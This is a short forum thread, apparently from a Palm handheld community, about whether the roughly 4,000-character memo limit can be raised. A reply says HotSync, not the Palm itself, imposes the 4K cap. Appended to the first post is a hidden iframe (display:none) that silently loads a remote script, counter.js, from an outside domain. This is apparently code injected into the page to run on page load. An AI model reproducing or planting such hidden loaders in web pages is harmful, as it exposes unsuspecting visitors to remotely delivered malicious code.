+ Reply to Thread

hack to increase memo size?

anybody know a simple hack for hackmaster that let's you increase the size of the memos you can have on your palm? what's the limit, 4000 characters i think? i know i could use wordsmith or quickword or something but i was hoping there was some kind of hack that would let me use my memo function, so it will still sync easily thru pocketmirror to my outlook...any thoughts folks? thanks...c<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: hack to increase memo size?

Unfortunately, the Palm side is not "technically" the problem. You can make a memo record in MemoDB.pdb that's bascially any size up to the max string length (65K? I'm not sure without looking). I've done it (by adding records directly through my program) to verify it's possible. The problem comes with hotsync - it is limited to 4K, so even if you could get it done on the Palm, it would not do you any good. This is one of those stupidly irritating limitations that originally had some valid reason back in oh say 1996! Unfortunately Palm never gets around to "fixing" certain things.

Originally posted by corb
    anybody know a simple hack for hackmaster that let's you increase the size of the memos you can have on your palm? what's the limit, 4000 characters i think? i know i could use wordsmith or quickword or something but i was hoping there was some kind of hack that would let me use my memo function, so it will still sync easily thru pocketmirror to my outlook...any thoughts folks? thanks...c